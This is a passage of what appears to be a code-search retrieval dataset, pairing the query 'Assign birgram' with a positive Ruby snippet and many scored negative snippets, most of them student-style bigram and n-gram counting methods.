"def add(page)\n return if task['skip_file_generation']\n num_rows = file_writer.add(page)\n\n if task['with_rehearsal'] and @index == 0 and !@rehearsaled\n if num_rows >= task['rehearsal_counts']\n load_rehearsal\n @rehearsaled = true\n end\n end\n end",
"def add_to_table(cmd)\n return unless size_check(cmd)\n @table.unshift(cmd)\n end",
"def most_frequent_bigram(str)\n binaries = [] \n letters = str.split(\"\") #\"thrill\"\n (0...(letters.length-1)).each_with_index do |letter,idx|\n binaries << (letters[idx] + letters[(idx + 1)])\n end\n hash = Hash.new(0)\n binaries.each do |pairs|\n hash[pairs] += 1 \n end\n sorted = hash.sort_by { |k , v| v }\n return sorted[-1][0]\nend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\t#begin\n\t#processes file at each line\n\tIO.foreach(file_name) do |line|\n\t\t#cleans up song title\n\t\tline = cleanup_title(line)\n\t\t#prevents a nil error with a cleaned up song\n\t\tif line != nil\n\t\t\t#removes stop words from line\n\t\t\tline = cleanupStopWords(line)\n\t\t\t#creates an array of bigrams as found on stackoverflow.com\n\t\t\tbigramArray = line.split.each_cons(2) do |e|\n\t\t\t\t#checks if the bigram exists\n\t\t\t\tif e[0] && e[1] != nil\n\t\t\t\t\t#makes a count from the existing bigram hash value\n\t\t\t\t\tcount = $bigrams[e[0]][e[1]]\n\t\t\t\t\tcount += 1\n\t\t\t\t\t#sets bigram hash value to updated count\n\t\t\t\t\t$bigrams[e[0]][e[1]] = count\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend\n\tputs \"Finished. Bigram model built.\\n\"\nrescue\n\tSTDERR.puts \"Could not open file\"\n\texit 4\nend",
"def ngram_analysis(str, n)\r\n # use a hash to store ngram - frequency mapping\r\n freq = Hash.new\r\n bigram = \"\"\r\n count = n-1\r\n i = 0\r\n\r\n # get the first ngram\r\n for i in 0..count\r\n bigram[i] = str[i]\r\n end\r\n\r\n freq[bigram] = 1\r\n\r\n str.each_char do |char|\r\n if i>=n then\r\n\r\n # bigram, trigram or quadrigram?\r\n bigram[0] = bigram[1]\r\n if n==2 then\r\n bigram[1] = char\r\n elsif n==3 then\r\n bigram[1] = bigram[2]\r\n bigram[2] = char\r\n elsif n==4 then\r\n bigram[1] = bigram[2]\r\n bigram[2] = bigram[3]\r\n bigram[3] = char\r\n end\r\n\r\n # updates values in the hash\r\n if freq.key?(bigram)==false then\r\n freq[bigram] = 1\r\n else \r\n freq[bigram] = freq[bigram]+1\r\n end\r\n\r\n end\r\n i = i + 1\r\n end\r\n\r\n # sort and print\r\n freq = freq.sort_by {|_key, value| value}.reverse.to_h\r\n i=0\r\n puts \"N-gram Analysis Results:\"\r\n freq.each do |key, value|\r\n if value!=1 && i<20 then\r\n puts key.to_s+\"\\t\"+value.to_s\r\n end\r\n i = i + 1\r\n end\r\nend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\n\t\t\ttitle = cleanup_title(line)\n\t\t\t# If the title is valid continue\n\t\t\tif title != nil\n\t\t\t\t# Split the title into words\n\t\t\t\twords = title.split(\" \")\n\t\t\t\tw_index = 0\n\t\t\t\t# Remove the stop words\n\t\t\t\twords = words - %w{a an and by for from in of on or out the to with}\n\t\t\t\t# If there is more than one word in a title add to biagram\n\t\t\t\tif words.length > 1\n\t\t\t\t\twords.each do |w|\n\t\t\t\t\t\t# If there is no base word add it\n\t\t\t\t\t\tif $bigrams[w] == nil\n\t\t\t\t\t\t\t$bigrams[w] = Hash.new\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] = 1\n\t\t\t\t\t\t# Else if there is no word following the word add it\n\t\t\t\t\t\telsif $bigrams[w][words[w_index + 1]] == nil\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] = 1\n\t\t\t\t\t\t# Else increment the count of the word following\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] += 1\n\t\t\t\t\t\tend\n\t\t\t\t\t\tw_index += 1\n\t\t\t\t\t\t# Don't include the last word in the title\n\t\t\t\t\t\tif w_index > words.length - 2\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\traise\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def most_frequent_bigram(str)\n bigram_hash = Hash.new(0)\n\n (0...str.length - 1).each do |idx|\n bigram_hash[str[idx] + str[idx+1]] += 1\n end\n\n sorted = bigram_hash.sort_by { |k, v| v }\n sorted[-1][0]\nend",
"def lexigram_counter(sequencetext)\n @sequencetext = sequencetext\n\t@lexigrams = lexigram_searcher(@sequencetext)\n\tif (@lexigrams === [\"no letters remain after processing\"])\n\t @lexigrams_count = 0\n else\n @lexigrams_count = @lexigrams.count.to_s\n end\n end",
"def use_bigram(str,i)\n\t\tmax=@han[str[i]][0]\n\t\tif i==0\n\t\t\t@han[str[i]].each{|h|\n\t\t\t\tif ref(\"$\"+h)>ref(\"$\"+max)\n\t\t\t\t\tmax=h\n\t\t\t\tend\n\n\t\t\t}\n\t\telse\n\t\t\t\t@han[str[i]].each{|h|\n\t\t\t\tif ref(str[i-1]+h)>ref(str[i-1]+max)\n\t\t\t\t\tmax=h\n\t\t\t\tend\n\n\t\t\t}\n\t\tend\n\t\treturn max\n\n\tend",
"def bigram_compare(word1_bigrams, word2_bigrams)\n most_bigrams = [word1_bigrams.count, word2_bigrams.count].max\n num_matching(word1_bigrams, word2_bigrams).to_f / most_bigrams\n end",
"def most_frequent_bigram(str)\n bigram = Hash.new(0)\n (0...str.length).each { |index| bigram[str[index..index+1]] += 1 }\n bigram.key(bigram.values.max)\nend",
"def line_count_experiment\n @letters_two.dump\n lines = @letters_two.xlate(@line_count_map)\n lines << @extra_digits\n lines.flatten!\n lines.dump('append')\n lines.chunk(2).to_i.collect { |d| d.to_s(5) }.dump(:from_base_5).to_i.to_letter\nend",
"def most_frequent_bigram(str)\n count = Hash.new(0)\n\n (0...str.length - 1).each do |i|\n bigram = str[i..i + 1]\n\n count[bigram] += 1\n end\n\n count.sort_by { |k, v| v } [-1][0]\nend",
"def most_frequent_bigram(str)\n bigram_count = Hash.new(0)\n\n # count each bigram appearance\n (0...str.length - 1).each do |i|\n bigram = str[i] + str[i+1]\n bigram_count[bigram] += 1\n end\n\n # return most frequent bigram\n bigram_count.max_by { |k, v| v }.first\nend",
"def most_frequent_bigram(str)\n h = Hash.new(0)\n bigrams = (0..str.length-2).map{|i| str[i..i+1]}\n bigrams.each {|bi| h[bi] += 1}\n h.key(h.values.max)\nend",
"def add_to_repetitions(char)\n if char.rank == @largest_power && !@last_char_was_prefix\n @number_of_repetitions += 1\n else\n @number_of_repetitions = 0\n end\n end",
"def set_count(gram,value)\n @dirty = true\n @frequencies[gram] = value\n end",
"def most_frequent_bigram(str)\n new_array =[]\n new_arr = []\n hash = {}\n hash = Hash.new {|k, v| hash[k] = 0}\n new_str = str.split(\"\")\n (0...new_str.length).each do |i0|\n (i0...new_str.length).each do |iz|\n pair = new_str[i0..iz]\n new_array << pair\n end\n end\n\n new_array.each do |combined|\n if combined.length == 2\n new_arr << combined \n end\n end\n \n new_arr.each do |pairs| \n hash[pairs] += 1\n end\n \n hash.each {|k, v| return k.join(\"\") if v == hash.values.max}\n\n \nend",
"def unigram_exists(word)\n\t$unigrams.each do |x|\n\t\tif x.matches(word)\n\t\t\tx.increase_count\n\t\t\treturn true\n\t\tend\t\n\tend\n\treturn false\nend",
"def add_and_check_digrams(rule, node, digram_index)\n puts \"Starting add_and_check, seq is #{rule.sequence.inspect}\"\n digram=[node, node.next]\n digram_values=[node.value, node.next.value]\n puts \"This digram is #{digram.inspect}\"\n digram_locations=digram_index[digram_values]\n if (existing_rule=digram_locations.first).is_a? Rule\n # replace with existing rule\n puts \"Main loop, replace with existing\"\n replacement=rule.replace_digram_with( digram.first, existing_rule ) \n puts \"main replace done\"\n elsif digram_locations.size+1 > K\n # create a new rule\n $grammar.counter+=1\n new_rule=Rule.new($grammar.counter, digram_index)\n digram_values.each {|val| new_rule << val}\n $grammar << new_rule\n digram_locations << digram.first\n # replace all occurrences of the digram with the rule\n digram_locations.each {|digram_head|\n puts \"Main loop, replace with new\"\n replacement=rule.replace_digram_with( digram_head, new_rule )\n puts \"main replace new done\"\n }\n else\n # Not more than K occurrences yet.\n # Add this node to the list of digram locations\n digram_locations << node\n end\n puts \"Leaving. seq is now #{rule.sequence.inspect}\"\nend",
"def most_frequent_bigram(str)\n sub_str_arr = []\n bigram_count = Hash.new(0)\n str.each_char.with_index do |char,idx|\n if idx+1 != nil && str[idx..idx+1].length ==2\n sub_str_arr << str[idx..idx+1]\n end\n end\n sub_str_arr.each {|bigram| bigram_count[bigram]+=1}\n \n sorted = bigram_count.sort_by {|key,value| value}\n sorted [-1][0]\n\n\nend",
"def start_table\r\n n = @char_set.length\r\n t_size = @size\r\n create_table(@char_set, '', n, t_size)\r\n end",
"def most_frequent_bigram(str)\n counts = Hash.new(0)\n (0...str.length-1).each do |i|\n bigram = str[i..i + 1]\n counts[bigram] += 1\n end\n\n sorted = counts.sort_by { |h,v| v } # sorts by value \n sorted.last[0]\nend",
"def most_frequent_bigram(str)\n n, hash, res, ct = str.length, Hash.new(0), \"\", 0\n (0...n).each do |i|\n break if i + 2 > n\n w = str[i..(i + 1)]\n hash[w] += 1\n if(ct < hash[w])\n ct = hash[w]\n res = w\n end\n end\n res\nend",
"def create_table(set, prefix, n, t_size)\r\n \t# base case\r\n if t_size.zero?\r\n @table_array[@table_i] = prefix.chars\r\n @table_i += 1\r\n return\r\n end\r\n \r\n # recursive case\r\n set.each do |x|\r\n new_prefix = prefix + x\r\n create_table(set, new_prefix, n, t_size - 1)\r\n end\r\n end",
"def most_frequent_bigram(str)\n bigram_hash = Hash.new(0)\n\n i = 0\n while i < str.length - 1\n bigram_hash[str[i..i+1]] += 1\n i += 1\n end\n\n bigram_hash.max_by {|k, v| v}[0]\nend",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n str.each_char.with_index do |char, idx|\n key = char + str[idx + 1] if idx < str.length - 1\n hash[key] += 1\n end\n\n hash.key(hash.values.max)\nend",
"def test_approach\n prefix = \"This pangram tallies \"\n solution = \"This pangram tallies five a's, one b, one c, two d's, twenty-eight e's, eight f's, six g's, eight h's, thirteen i's, one j, one k, three l's, two m's, eighteen n's, fifteen o's, two p's, one q, seven r's, twenty-five s's, twenty-two t's, four u's, four v's, nine w's, two x's, four y's and one z.\"\n pangram = SelfDocumentingPangram.new(prefix)\n assert_equal(solution, pangram.add_count(pangram.count(solution)))\n\n prefix = \"This terribly inefficient pangram contains \"\n solution = \"This terribly inefficient pangram contains five a's, two b's, three c's, two d's, thirty-one e's, six f's, four g's, ten h's, sixteen i's, one j, one k, three l's, two m's, twenty n's, thirteen o's, two p's, one q, twelve r's, twenty-eight s's, twenty-eight t's, three u's, three v's, nine w's, four x's, six y's and one z.\"\n pangram = SelfDocumentingPangram.new(prefix)\n assert_equal(solution, pangram.add_count(pangram.count(solution)))\n end",
"def add_letters_to_bag()\n\n bag = [\"Z\", \"X\", \"J\", \"K\", \"Q\"] # Letters which only appear once\n \n 2.times do # Letters which appear twice\n bag << \"V\"\n bag << \"W\"\n bag << \"B\"\n bag << \"C\"\n bag << \"F\"\n bag << \"H\"\n bag << \"M\"\n bag << \"Y\"\n bag << Blank.new\n bag << \"P\"\n end\n\n 3.times do bag << \"G\" end\n\n 4.times do\n bag << \"D\"\n bag << \"L\"\n bag << \"S\"\n bag << \"U\"\n end\n\n 6.times do\n bag << \"N\"\n bag << \"R\"\n bag << \"T\"\n end\n \n 8.times do bag << \"O\" end \n\n 9.times do\n bag << \"A\"\n bag << \"I\"\n end\n\n 12.times do bag << \"E\" end\n\n return bag\n end",
"def append_word(size)\n return false unless remaining > size\n w = @buckets[size].pop\n @lines[@current_index] += @sep + w\n @sep = \" \"\n return true\n end",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n str.each_char.with_index {|c, i| hash[c + str[i+1]] += 1 if str[i + 1]}\n hash.key(hash.values.max)\nend",
"def most_frequent_bigram(str)\n most_frequent_bigram = Hash.new(0)\n\n str.each_char.with_index do |char, index|\n bigram = \"#{char}#{str[index + 1]}\"\n most_frequent_bigram[bigram] += 1\n end\n\n max_count = most_frequent_bigram.sort_by {|k, v| v}\n max_count[-1][0]\nend",
"def add_initial(prefix)\n # A pangram is : \"prefix\" + counts of each letter + \"and\" before 'z'\n known_string = prefix.downcase + ('a'..'z').to_a.join(\"\") + \"and\"\n add_function(:initial, known_string, '+', @add_word)\n\n # known_count[letter] is the count of each letter we know must exist\n known_count = known_string.to_counts\n\n name_bytes = Array.new(26).fill(0)\n (1..99).each { |n| n.to_en.accum_counts(name_bytes) }\n in_names = name_bytes.collect {|n| n > 0}\n # Now we have an array of booleans representing whether a character\n # is constant (only appearing in the prefix or enumerated list)\n # or is a variable quantity (because it also appears in number names\n\n # From the count of what we initially knew to be present, return\n # our initial target. This is our best initial guess for a result\n # which will converge quickly. Basically, anything which is\n # not found in a name, is now known to occur a constant number of\n # times in the result. If it is in a name, I just punt and\n # prepare to see it 1 time like Simon does.\n @target_template = in_names.zip(known_count).collect do |in_name, known|\n if in_name\n 1\n else\n known\n end\n end\n\n # Starting with the count of known contents add the letter counts\n # for the numbers we expect to see. The counts in the target template\n # indicate that we expect to see N occurences of that (char) in the\n # result. Thus if 7 a's are reflected in the target we must have\n # an associated set of bytes {seven's} in the result. The following\n # code initializes the result template with the static byte counts\n # that we know must occur in the result. Using the target template as\n # a guide, we then call the appropriate adder_function to increment\n # the counts for the spelled out numbers which MUST be present in\n # the result if our guess remains congruent. e.g. if the target contained\n # [7, 2, 1, 2]... we MUST increment the result_template by\n # \"sevens\" \"twos\" \"one\" \"twos\"\n @result_template = known_count.dup\n @target_template.each do |n|\n @add_word[n].call(@result_template)\n end\n\n end",
"def count(gram)\n @dirty = true\n\n unless @frequencies.has_key?(gram)\n @frequencies[gram] = 0\n end\n\n return @frequencies[gram] += 1\n end",
"def create_title(word)\n\tcurrent = word\n\tword_num = 1 # begin word number at one\n\ttitle = \"\" # title begins as empty\n\ttitle += word # add current word\n\twhile word_num !=20 # while we have less than 20 words...\n\t\t\tif ($bigrams.has_key?(current)) # if the word exists in the bigram\n\t\t\t\tif (mcw(current) == nil)\n\t\t\t\t\t# do nothing and exit\n\t\t\t\t\tword_num = 20\n\t\t\t\telse\n\t\t\t\t\taddition = mcw(current) # thing to add is mcw\n\t\t\t\t\ttitle += \" \" # add space for readability\n\t\t\t\t\ttitle += addition # add addition to the title\n\t\t\t\t\tcurrent = addition # set current to the new wordtitle += addition # add the mcw\n\t\t\t\t\tword_num += 1 # increment by one and then go throuh\n\t\t\t\tend\n\t\t\telse word_num = 20 # otherwise, we exit\n\t\t\tend\n\t\tend\n\t\treturn title\nend",
"def most_frequent_bigram(str)\n#grab substrings of length 2\n#hash that contains the substring\n#return key with max value \n\n bigrams = Hash.new(0)\n str.each_char.with_index do |char, i|\n bigrams[str[i..i+1]] += 1 if i + 1 < str.length\n end\n bigrams.max_by { |k,v| v }.first\nend",
"def visit_file(name)\n\t\ttrigram = []\n\t\tFile.open(name).each { |line|\n\t\t\ttrigram.push line.chomp\n\t\t\tif trigram.length > 3\n\t\t\t\ttrigram.shift\n\t\t\tend\n\t\t\tif trigram.length == 3\n\t\t\t\tt = Array.new(trigram)\n\t\t\t\t@trigram_counts[t] = 1 + @trigram_counts[t] \n\t\t\tend\n\t\t}\n\tend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# Pull title out of text line\n\t\t\ttitle = cleanup_title(line)\n\n\t\t\tif not title.nil?\n\t\t\t # Split title into individual words\n\t\t\t words = title.split(\" \")\n\n\t\t\t\t# Remove stop words\n\t\t\t\tstop_words = ['a', 'an', 'and', 'by', 'for', 'from', 'in', 'of', 'on',\n\t\t\t\t\t 'or', 'out', 'the', 'to', 'with']\n\n\t\t\t\tfor i in 0..stop_words.length-1\n\t\t\t\t\twords.delete(stop_words[i])\n\t\t\t\tend\n\n\t\t\t\t# Count subsequent words\n\t\t\t\tfor i in 0..words.length-2\n\t\t\t\t\t$bigrams[words[i]][words[i+1]] += 1\n\t\t\t\tend\n\t\t\tend\n\tend\n\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def add_PB_buffer\n show do\n title \"Add the following volumes of PB buffer to the corresponding tube.\"\n table operations.start_table\n .input_item(INPUT)\n .custom_column(heading: \"PB Volume in uL\", checkable: true) { |op| 500} # add 5x PB\n .end_table\n warning \"After adding volumes, vortex and spin all tubes\"\n end\n end",
"def most_frequent_bigram(str)\n adjacent_letter={}\n letter=\"\"\n (0...str.length-1).each do |i|\n letter=str[i]+str[i+1]\n if adjacent_letter.has_key?(letter)\n adjacent_letter[letter]+=1\n else\n adjacent_letter[letter]=1\n end\n end\n\n max=0\n max_aj=\"\"\n adjacent_letter.each do |k,v|\n if v>max\n max=v\n max_aj=k\n end\n end\n max_aj\n\n\nend",
"def most_frequent_bigram(str)\n bigrams = Hash.new(0)\n\n i = 0\n while i < str.length - 1\n bigrams[str[i..i+1]] += 1 \n i += 1\n end\n\n max_num = 0\n max = nil\n\n bigrams.each do |k,v|\n if v > max_num\n max_num = v\n max = k\n end\n end\n max\nend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\tsong = cleanup_title(line)\n\n\t\t\tif not song.nil? and song =~ /^[\\d\\w\\s']+$/\n\t\t\t\tsong = song.downcase\n\t\t\t\tsong.gsub!(/ {2}/, \" \")\n\t\t\t\tsong = remove_stop_words(song)\n\t\t\t\twords = song.split(\" \");\n\n\t\t\t\tupdate_bigram_counts(words)\n\t\t\tend\n\t\tend\n\n\t\tputs \"Finished. Bigram model built.\\n\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def give_letters(nbr_of)\n new_stock = []\n count_letters = []\n\n stock_letters.shuffle.each do |v|\n if count_letters.size < nbr_of\n count_letters << v\n else\n new_stock << v\n end\n end\n self.stock_letters = new_stock\n self.save\n return count_letters\n end",
"def longest_bigram(str)\n\tbigram_hash = Hash.new\n bigram_str = str.split(\" \")\n bigram_str.each_with_index do |word, i|\n if i == bigram_str.length - 1\n next\n else\n bigram_hash[word + \" \" + bigram_str[i + 1]] = (word + \" \" + bigram_str[i + 1]).length\n end\n end\n temp_str = \"\"\n temp_str_length = 0\n bigram_hash.keys.each do |compound|\n if compound.length > temp_str_length\n temp_str = compound\n temp_str_length = compound.length\n end\n end\n p temp_str\nend",
"def mis_ramos\n\n\tend",
"def to_asciibib(prefix = \"\")\n pref = prefix.empty? ? \"size\" : \"#{prefix}.size\"\n size.map { |s| s.to_asciibib pref, size.size }.join\n end",
"def most_frequent_bigram(str)\n pairs = Hash.new(0)\n str.each_char.with_index do |letter, indx|\n if indx != str.length-1\n pair = letter + str[indx+1]\n end\n pairs[pair] += 1\n end\n pairs.key(pairs.values.max)\nend",
"def q_and_a(token_size = TOKEN_SIZE, char_clean = CHAR_CLEAN, test = \"n\")\n prepend_char = \"\"\n if test == \"y\"\n prepend_char = \"test-\"\n end\n token_index = create_index(token_size,char_clean)\n unique_index = token_index.delete_if{|key, value| value.size > 1}\n output_dir = Pathname.new(OUTPUT_DIR)\n output_dir.mkpath if !output_dir.exist?\n token_file = File.open(File.join(OUTPUT_DIR, prepend_char + TOKEN_FILENAME), \"w\")\n word_file = File.open(File.join(OUTPUT_DIR, prepend_char + WORD_FILENAME), \"w\")\n unique_index.each do |key, value|\n token_file.puts key\n word_file.puts value\n end \n token_file.close\n word_file.close\n end",
"def most_frequent_bigram(str)\n bigrams_hash = biagram_hash(str)\n bigrams_hash.key(bigrams_hash.values.max)\nend",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n\n str.each_char.with_index do |char, i|\n if i != str.length - 1\n bigram = char + str[i + 1]\n end\n hash[bigram] += 1\n end\n most_frequent = hash.values.max\n hash.each { |k, v| return k if v == most_frequent}\n\nend",
"def +(bleu)\n\t\tthrow \"ngram size mismatch!\" if @ngram != bleu.ngram\n\n\t\tnewnc = []\n\t\tnewtc = []\n\t\t(1..@ngram).each{|n|\n\t\t\tnewnc[n] = @ngram_clips[n] + bleu.ngram_clips[n]\n\t\t\tnewtc[n] = @tcount[n] + bleu.tcount[n]\n\t\t}\n\t\t\n\t\tv = nil\n\t\tif @verbose > bleu.verbose\n\t\t\tv=@verbose\n\t\telse\n\t\t\tv=bleu.verbose\n\t\tend\n\n\t\tBLEU.new(nil, [newnc, newtc, @best_match_lengths + bleu.best_match_lengths, @ngram,v])\n\tend",
"def pangram?\n return @hist.size == 26\n end",
"def build_char_frequency_table(phrase)\n table = Array.new(26, 0)\n\n phrase.each_char do |char|\n x = get_char_number(char)\n if x != -1\n table[x] += 1\n end\n end\n\n table\nend",
"def most_frequent_bigram(str)\n counter = Hash.new(0)\n (0...str.length-1).each { |i| counter[str[i] + str[i+1]] += 1 }\n sorted = counter.sort_by { |k, v| v }\n sorted[-1][0]\nend",
"def increment_bucket(bucket)\n (bucket + 1) % table.length\n end",
"def genbank\n chars = 60\n lines = (length / chars.to_f).ceil\n width = length.to_s.length\n\n s = ''\n (1..lines).each do |i|\n s << \"%#{width}d\" % (chars * (i - 1) + 1)\n s << ' '\n s << to_s[chars * (i - 1), chars].scan(/\\w{1,10}/).join(' ')\n s << \"\\n\"\n end\n s\n end",
"def add_replicates\n\n #create path variable\n path = File.join(\"/home/jarvis\",\"test_app\",\"extra_scripts\")\n\n files = Dir[\"#{path}/*.gpr\"]\n dummynames = Array.new\n dummyTSI = Array.new\n\n files.each_with_index do |file, i|\n dummynames[i], dummyTSI[i] = readGpr(file)\n end \n\n tsi_container = dummyTSI.transpose\n tsi_container.map! {|e| e.map! {|f| f < 0? 0 : f}}\n tsi_container.map! {|e| e.inject(:+)/e.size}\n\n names_container = dummynames[0]\n\n \n \n puts tsi_container.to_s\n puts names_container.to_s\n\n puts tsi_container.size\n puts names_container.size\n\n end",
"def test_add100\n\n # make new file and fill with data\n\t\tfill_file(100)\n\t\t \t\n \tfb=Fastabin.new(TEST_FILE,'r') \t \t\n assert_equal(100,fb.count)\n fb.close\n \t\t\n end",
"def increment_playcount(path)\n # sometimes files don't end up in the database, add them when played\n self.new_file(path)\n @files.filter(:path => path).update(:playcount => Sequel.expr(1) + :playcount)\n end",
"def most_frequent_bigram(str)\n bigrams = Hash.new(0)\n (0...str.length-1).each{|i| bigrams[ str[i..i+1] ] += 1}\n max = bigrams.first[0] # Hash#first returns first key value pair in an array\n bigrams.each {|key,val| max = key if val > bigrams[max]}\n # bigrams.sort_by{|b, v| v}.last[0]\n max\nend",
"def good_bigram?(word)\n return false if REJECT_BIGRAMS.include?(word)\n return false if word.size < 2\n true\n end",
"def upgrade_RAM!(ram_in_GB)\n upgrade_item_price = _item_price_in_category(\"ram\", ram_in_GB)\n _order_upgrade_item!(upgrade_item_price) if upgrade_item_price\n nil != upgrade_item_price\n end",
"def to_h\n words = {}\n @table.each do |words, bigram|\n words[words] = bigram.rank\n end\n words\n end",
"def try_another_size(size)\n half_size = remaining / 2 - 1\n append_size = have_size?(half_size) ? half_size : largest_sized_bucket\n\n if append_word(append_size)\n add_words_starting_size(remaining - 1)\n elsif size > 1\n add_words_starting_size(size - 1)\n end\n end",
"def generate_counts(data)\n counts = {}\n data.each do |line|\n unigram = nil\n bigram = nil\n trigram = nil\n\n # prepend buffering ghost values so we can represent trigrams of the first word\n tokens = line.split(' ')\n\n # take a sliding window of the entire line, generating grams as we go\n (1..(tokens.size-1)).to_a.each do |i|\n unigram = tokens[i..i]\n bigram = tokens[i-1..i]\n trigram = tokens[i-2..i]\n\n counts.store(unigram, counts.fetch(unigram, 0) + 1)\n counts.store(bigram, counts.fetch(bigram, 0) + 1)\n counts.store(trigram, counts.fetch(trigram, 0) + 1)\n end\n end\n counts\nend",
"def add_string(string) \n unless @strings.include? string\n @strings[string] = self.strtab.num_bytes\n self.strtab << BinData::Stringz(string)\n end\n @strings[string]\n end",
"def prefix_encode(column)\n result = []\n encoded_val = false\n oc_count = 0\n column[\"av\"].each_with_index do |v, i|\n if i == 0\n result.push(v)\n oc_count = oc_count + 1\n elsif v == 0\n oc_count = oc_count + 1\n else\n result.push(v)\n end\n end\n column[\"av\"] = result\n column[\"oc_count\"] = oc_count\nend",
"def most_frequent_bigram(str)\n most_freq = \"\"\n highest_freq = 0\n bigram_hash = Hash.new(0)\n len = str.length\n (0...len-1).each { |idx| bigram_hash[str[idx..idx+1]] += 1 }\n bigram_hash.each do |k, v| \n if v > highest_freq\n most_freq = k \n highest_freq = v\n end\n end\n most_freq\nend",
"def repeats\n @total_letters - @hist.size\n end",
"def table_size_for(entry_count); end",
"def mb_count()\n each_char.map{|c| c.bytesize == 1 ? 1 : 2}.reduce(0, &:+)\n end",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n str.each_char.with_index do |char, idx|\n hash[str[idx..idx+1]] += 1\n end\n max = 0\n max_bigram = \"\"\n hash.each_pair do |key, value|\n if value > max\n max_bigram = key\n max = value\n end\n end\n return max_bigram\nend",
"def place_file_in_buckets(file)\n (0..@band_settings.bands).each do |band|\n @table.add_item(\n file, \n band_hash(file.signature_vector, band)\n )\n end\n end",
"def add_word(word)\n chars = word.chars\n current = @root\n\n chars.each do |c|\n current = add_character(c, current)\n current.word_count += 1\n end\n current.is_word = true\n end",
"def add(primary_key, fields, analyzers, suffix_array_writer)\n base_offset = @io.pos\n write_header(primary_key, fields)\n fields.each_with_index {|field,index|\n data = field || ''\n suffix_offset = store_field(data)\n suffix_array_writer.append_suffixes(analyzers[index], data, suffix_offset, base_offset, index)\n } \n write_footer((@io.pos-base_offset)+5)\n end",
"def has_gram?(gram)\n @frequencies.has_key?(gram)\n end",
"def include_letter(word, letter)\n index = 0 \n if @letter_bank.include?(letter) \n puts \"You already tried this letter\"\n else \n word.each_char do |l|\n if l == letter\n @blanks[index] = letter\n end \n index += 1\n end \n @guess_count -= 1 \n @letter_bank << letter\n end \n puts \"You have #{guess_count} guesses left\"\n p @blanks\n end",
"def verb_count\n return self[:verbs_count] if self[:verbs_count]\n self[:verbs_count] = self.verb_coding_frame_microroles.pluck(:verb_id).uniq.size\n save\n self[:verbs_count]\n end"
] | [
"0.6841609",
"0.66230047",
"0.6436192",
"0.60747945",
"0.57095593",
"0.56737536",
"0.55105084",
"0.53605306",
"0.53107405",
"0.5254298",
"0.5250469",
"0.52405584",
"0.52169746",
"0.52101177",
"0.5183813",
"0.51052535",
"0.5077029",
"0.50676984",
"0.50429875",
"0.50318074",
"0.5027517",
"0.5025446",
"0.50207347",
"0.4927599",
"0.49189326",
"0.49045843",
"0.48966154",
"0.48892397",
"0.4877156",
"0.48567405",
"0.48483798",
"0.48338795",
"0.48166376",
"0.47974727",
"0.478554",
"0.475954",
"0.47589567",
"0.4747503",
"0.47445056",
"0.47394952",
"0.47254702",
"0.4714793",
"0.47068623",
"0.4701087",
"0.47006047",
"0.46993408",
"0.46961224",
"0.46952912",
"0.46880323",
"0.4685968",
"0.4684637",
"0.46767816",
"0.46765018",
"0.46735078",
"0.46550938",
"0.46423197",
"0.46416205",
"0.46394962",
"0.46368167",
"0.4635701",
"0.4634195",
"0.4629643",
"0.4627336",
"0.46128336",
"0.461053",
"0.45814922",
"0.45781085",
"0.45727602",
"0.45703322",
"0.4567235",
"0.4565893",
"0.45579043",
"0.45503125",
"0.45449522",
"0.45322257",
"0.45320636",
"0.4530291",
"0.4529355",
"0.45232517",
"0.45172805",
"0.45107335",
"0.45099887",
"0.45047835",
"0.44883737",
"0.44707954",
"0.44675767",
"0.4464896",
"0.44573477",
"0.44554612",
"0.44543335",
"0.44452474",
"0.4441763",
"0.4412619",
"0.44056663",
"0.4404279",
"0.44027483",
"0.43961474",
"0.43952462",
"0.43890828",
"0.43845356"
] | 0.6372739 | 3 |
Assign birgram. def []=(word1, word2) | def list
@table.keys
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def initialize word1, word2\n \t@word1 = word1\n \t@word2 = word2\n end",
"def adv\n @words1 = Word.all.sample(1)[0].word\n @words2 = Word.all.sample(1)[0].word\n end",
"def initialize word \n @word = word\n @guesses = ''\n @wrong_guesses = ''\n end",
"def populate(words)\n # Create an array of words and normailze it: we delete all cr chars (\\r) and put all letters downcase\n words = words.downcase.delete(\"\\r\").split(\"\\n\")\n # The anagram words contain the same letters, so we can create an hash where the key is a common index,\n # and the value is an array of words with the same key\n self.words_hash = words.each_with_object(Hash.new []) do |word,hash|\n hash[create_index(word)] += [word]\n end\n end",
"def initialize(word)\r\n\t\t@word = word.split(\"\")\r\n\t\t@guesses = @word.length * 2\r\n\t\t@underscore_array = @word.map {|x| \"_\" }\r\n\t\t@underscore = @underscore_array.join(\" \")\r\n\t\t@guessed_array = []\r\n\tend",
"def matching_bigrams(word1)\n list = @index[word1]\n list.map{ |word2| @table[[word1,word2]] }\n end",
"def initialize()\n @word = ''\n @guesses = ''\n @wrong_guesses = ''\n end",
